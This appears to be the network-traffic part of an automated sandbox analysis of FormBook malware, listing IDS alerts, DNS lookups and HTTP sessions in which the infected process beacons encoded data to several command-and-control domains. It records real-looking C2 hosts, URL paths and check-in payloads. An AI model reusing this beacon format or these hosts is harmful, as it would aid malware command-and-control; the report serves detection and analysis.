2025-01-10T18:05:01.557997+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49985	185.199.108.153	80	TCP
2025-01-10T18:05:04.117065+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49986	185.199.108.153	80	TCP
2025-01-10T18:05:10.670177+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49987	104.21.64.1	80	TCP
2025-01-10T18:05:13.233018+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49988	104.21.64.1	80	TCP
2025-01-10T18:05:15.795444+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49989	104.21.64.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:04:26.028780937 CET	49892	80	192.168.2.5	161.97.142.144
Jan 10, 2025 18:04:26.034486055 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.034605026 CET	49892	80	192.168.2.5	161.97.142.144
Jan 10, 2025 18:04:26.044209957 CET	49892	80	192.168.2.5	161.97.142.144
Jan 10, 2025 18:04:26.049072981 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.662902117 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.662926912 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.662945986 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.662965059 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.662981987 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:26.663075924 CET	49892	80	192.168.2.5	161.97.142.144
Jan 10, 2025 18:04:26.663181067 CET	49892	80	192.168.2.5	161.97.142.144
Jan 10, 2025 18:04:26.673808098 CET	49892	80	192.168.2.5	161.97.142.144
Jan 10, 2025 18:04:26.679066896 CET	80	49892	161.97.142.144	192.168.2.5
Jan 10, 2025 18:04:42.052784920 CET	49979	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:42.057626963 CET	80	49979	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:42.058381081 CET	49979	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:42.082901955 CET	49979	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:42.087719917 CET	80	49979	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:42.525103092 CET	80	49979	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:42.525142908 CET	80	49979	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:42.525230885 CET	49979	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:43.593053102 CET	49979	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:44.610644102 CET	49980	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:44.615741968 CET	80	49980	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:44.615843058 CET	49980	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:44.630234003 CET	49980	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:44.635145903 CET	80	49980	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:45.239418983 CET	80	49980	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:45.239435911 CET	80	49980	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:45.239495039 CET	49980	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:45.239520073 CET	80	49980	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:45.239588976 CET	49980	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:46.138875008 CET	49980	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:47.159337997 CET	49981	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:47.164263964 CET	80	49981	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:47.168061018 CET	49981	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:47.177798033 CET	49981	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:47.182638884 CET	80	49981	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:47.182748079 CET	80	49981	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:47.652982950 CET	80	49981	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:47.653109074 CET	80	49981	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:47.653194904 CET	49981	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:48.685825109 CET	49981	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:49.704807997 CET	49982	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:49.711261988 CET	80	49982	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:49.711455107 CET	49982	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:49.720448971 CET	49982	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:49.726423979 CET	80	49982	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:50.155373096 CET	80	49982	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:50.155391932 CET	80	49982	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:50.155662060 CET	49982	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:50.158351898 CET	49982	80	192.168.2.5	172.96.187.60
Jan 10, 2025 18:04:50.163189888 CET	80	49982	172.96.187.60	192.168.2.5
Jan 10, 2025 18:04:55.966648102 CET	49983	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:55.971522093 CET	80	49983	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:55.971617937 CET	49983	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:55.987482071 CET	49983	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:55.993524075 CET	80	49983	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:56.433792114 CET	80	49983	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:56.451258898 CET	80	49983	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:56.451356888 CET	49983	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:57.498337984 CET	49983	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:58.516860962 CET	49984	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:58.521836042 CET	80	49984	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:58.521923065 CET	49984	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:58.536694050 CET	49984	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:04:58.541657925 CET	80	49984	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:58.975395918 CET	80	49984	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:58.992204905 CET	80	49984	185.199.108.153	192.168.2.5
Jan 10, 2025 18:04:58.992300034 CET	49984	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:00.045135975 CET	49984	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:01.063771963 CET	49985	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:01.068842888 CET	80	49985	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:01.068969011 CET	49985	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:01.083332062 CET	49985	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:01.088129997 CET	80	49985	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:01.088288069 CET	80	49985	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:01.540545940 CET	80	49985	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:01.557746887 CET	80	49985	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:01.557996988 CET	49985	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:02.592145920 CET	49985	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:03.610908985 CET	49986	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:03.615840912 CET	80	49986	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:03.616071939 CET	49986	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:03.629528999 CET	49986	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:03.634497881 CET	80	49986	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:04.096872091 CET	80	49986	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:04.116914988 CET	80	49986	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:04.117064953 CET	49986	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:04.118309021 CET	49986	80	192.168.2.5	185.199.108.153
Jan 10, 2025 18:05:04.124192953 CET	80	49986	185.199.108.153	192.168.2.5
Jan 10, 2025 18:05:09.143978119 CET	49987	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:09.149053097 CET	80	49987	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:09.149163008 CET	49987	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:09.163453102 CET	49987	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:09.168323994 CET	80	49987	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:10.670176983 CET	49987	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:10.675390959 CET	80	49987	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:10.675509930 CET	49987	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:11.690280914 CET	49988	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:11.695300102 CET	80	49988	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:11.695441008 CET	49988	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:11.716317892 CET	49988	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:11.721354961 CET	80	49988	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:13.233017921 CET	49988	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:13.238090992 CET	80	49988	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:13.238240004 CET	49988	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:14.255937099 CET	49989	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:14.260888100 CET	80	49989	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:14.261003017 CET	49989	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:14.286490917 CET	49989	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:14.291378021 CET	80	49989	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:14.291491985 CET	80	49989	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:15.795444012 CET	49989	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:15.800666094 CET	80	49989	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:15.800764084 CET	49989	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:16.813529968 CET	49990	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:16.818388939 CET	80	49990	104.21.64.1	192.168.2.5
Jan 10, 2025 18:05:16.818500996 CET	49990	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:16.827178955 CET	49990	80	192.168.2.5	104.21.64.1
Jan 10, 2025 18:05:16.831955910 CET	80	49990	104.21.64.1	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:04:25.840127945 CET	54295	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:04:26.021337032 CET	53	54295	1.1.1.1	192.168.2.5
Jan 10, 2025 18:04:41.784287930 CET	65090	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:04:42.046879053 CET	53	65090	1.1.1.1	192.168.2.5
Jan 10, 2025 18:04:55.173877954 CET	51340	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:04:55.959219933 CET	53	51340	1.1.1.1	192.168.2.5
Jan 10, 2025 18:05:09.126724005 CET	52692	53	192.168.2.5	1.1.1.1
Jan 10, 2025 18:05:09.141566992 CET	53	52692	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:04:25.840127945 CET	192.168.2.5	1.1.1.1	0x3481	Standard query (0)	www.030002513.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:41.784287930 CET	192.168.2.5	1.1.1.1	0xa6a5	Standard query (0)	www.mbakjisoo.site	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:55.173877954 CET	192.168.2.5	1.1.1.1	0xb125	Standard query (0)	www.pku-cs-cjw.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.126724005 CET	192.168.2.5	1.1.1.1	0x6c0a	Standard query (0)	www.vilakodsiy.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:04:26.021337032 CET	1.1.1.1	192.168.2.5	0x3481	No error (0)	www.030002513.xyz		161.97.142.144	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:42.046879053 CET	1.1.1.1	192.168.2.5	0xa6a5	No error (0)	www.mbakjisoo.site	mbakjisoo.site		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:04:42.046879053 CET	1.1.1.1	192.168.2.5	0xa6a5	No error (0)	mbakjisoo.site		172.96.187.60	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:55.959219933 CET	1.1.1.1	192.168.2.5	0xb125	No error (0)	www.pku-cs-cjw.top	187370.github.io		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 18:04:55.959219933 CET	1.1.1.1	192.168.2.5	0xb125	No error (0)	187370.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:55.959219933 CET	1.1.1.1	192.168.2.5	0xb125	No error (0)	187370.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:55.959219933 CET	1.1.1.1	192.168.2.5	0xb125	No error (0)	187370.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:04:55.959219933 CET	1.1.1.1	192.168.2.5	0xb125	No error (0)	187370.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:05:09.141566992 CET	1.1.1.1	192.168.2.5	0x6c0a	No error (0)	www.vilakodsiy.sbs		104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.030002513.xyz

www.mbakjisoo.site

www.pku-cs-cjw.top

www.vilakodsiy.sbs

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49892	161.97.142.144	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:26.044209957 CET	549	OUT	GET /95le/?Fz=2jBhVn&gjR=ZgllZHsiydchqBHBA1JMF+RoiwLw/ScJ/Jj32S4NIs+PSlV3776FANxFoYb4iH80r13xZ8RWQuyuUHwO/KTQwNAs4TqSGhVWgu7Bj48jZrfSqhqsOqTV9cKaFb+b133wug== HTTP/1.1 Host: www.030002513.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Jan 10, 2025 18:04:26.662902117 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 17:04:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Jan 10, 2025 18:04:26.662926912 CET	224	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
Jan 10, 2025 18:04:26.662945986 CET	1236	IN	Data Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69 Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
Jan 10, 2025 18:04:26.662965059 CET	474	IN	Data Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74 Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49979	172.96.187.60	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:42.082901955 CET	817	OUT	POST /s7cs/ HTTP/1.1 Host: www.mbakjisoo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.mbakjisoo.site Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 Referer: http://www.mbakjisoo.site/s7cs/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 55 79 6f 52 4c 33 7a 72 69 6c 4e 2f 37 46 35 57 58 48 55 50 53 62 6e 75 33 57 33 43 74 36 73 39 39 6c 63 4d 48 76 39 32 6d 76 4a 2b 2f 41 77 46 70 55 67 2f 32 65 4e 52 51 4e 32 45 4f 6a 73 61 4c 75 78 5a 74 76 2f 75 65 4d 42 38 6d 43 6e 47 2f 64 59 79 6d 2b 67 47 5a 67 55 31 7a 54 47 33 7a 68 6e 52 42 4f 57 56 55 50 2f 76 68 63 47 57 4b 59 4c 73 61 68 32 50 73 62 4a 4c 49 2f 72 73 49 78 38 78 45 39 44 52 53 7a 34 51 68 51 32 68 5a 65 34 59 67 4d 6f 5a 73 6e 71 50 44 53 6c 48 4c 73 62 38 46 64 74 76 4a 72 78 42 73 6e 36 66 2f 5a 42 4d 6c 32 36 35 57 6e 51 3d Data Ascii: gjR=aDmdZf0q1uw1UyoRL3zrilN/7F5WXHUPSbnu3W3Ct6s99lcMHv92mvJ+/AwFpUg/2eNRQN2EOjsaLuxZtv/ueMB8mCnG/dYym+gGZgU1zTG3zhnRBOWVUP/vhcGWKYLsah2PsbJLI/rsIx8xE9DRSz4QhQ2hZe4YgMoZsnqPDSlHLsb8FdtvJrxBsn6f/ZBMl265WnQ=
Jan 10, 2025 18:04:42.525103092 CET	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Fri, 10 Jan 2025 17:04:42 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49980	172.96.187.60	80	2764	C:\Program Files (x86)\PiUkMVbUwuHXbqoCLfEUYACZKrCveIQVlNtXojQA\YZKoIsKkwLJWPq.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 18:04:44.630234003 CET	837	OUT	POST /s7cs/ HTTP/1.1 Host: www.mbakjisoo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.mbakjisoo.site Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 Referer: http://www.mbakjisoo.site/s7cs/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-P7510 Build/JDQ39; CyanogenMod-10.1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30 Data Raw: 67 6a 52 3d 61 44 6d 64 5a 66 30 71 31 75 77 31 53 57 73 52 51 51 48 72 6b 46 4e 2b 33 6c 35 57 63 6e 55 4c 53 62 6a 75 33 53 48 53 74 73 30 39 39 41 59 4d 45 71 52 32 68 76 4a 2b 77 67 77 4b 74 55 67 4f 32 65 42 6a 51 4d 61 45 4f 6a 34 61 4c 76 42 5a 75 59 54 76 4d 73 42 2b 71 69 6e 45 67 4e 59 79 6d 2b 67 47 5a 67 41 54 7a 54 4f 33 79 53 2f 52 42 71 43 57 49 66 2f 73 6d 63 47 57 4f 59 4c 6f 61 68 33 67 73 65 67 65 49 39 54 73 49 77 4d 78 45 49 33 53 59 7a 34 53 38 41 33 50 5a 4d 74 44 69 2b 77 69 6c 42 33 6d 57 6b 78 74 44 36 71 57 66 2f 6c 48 61 4c 64 35 38 30 79 6f 75 70 67 6c 2f 56 71 4a 49 77 45 5a 78 46 6d 53 2b 42 51 70 63 53 6b 42 6c 45 77 6c 58 4a 42 79 Data Ascii: gjR=aDmdZf0q1uw1SWsRQQHrkFN+3l5WcnULSbju3SHSts099AYMEqR2hvJ+wgwKtUgO2eBjQMaEOj4aLvBZuYTvMsB+qinEgNYym+gGZgATzTO3yS/RBqCWIf/smcGWOYLoah3gsegeI9TsIwMxEI3SYz4S8A3PZMtDi+wilB3mWkxtD6qWf/lHaLd580youpgl/VqJIwEZxFmS+BQpcSkBlEwlXJBy
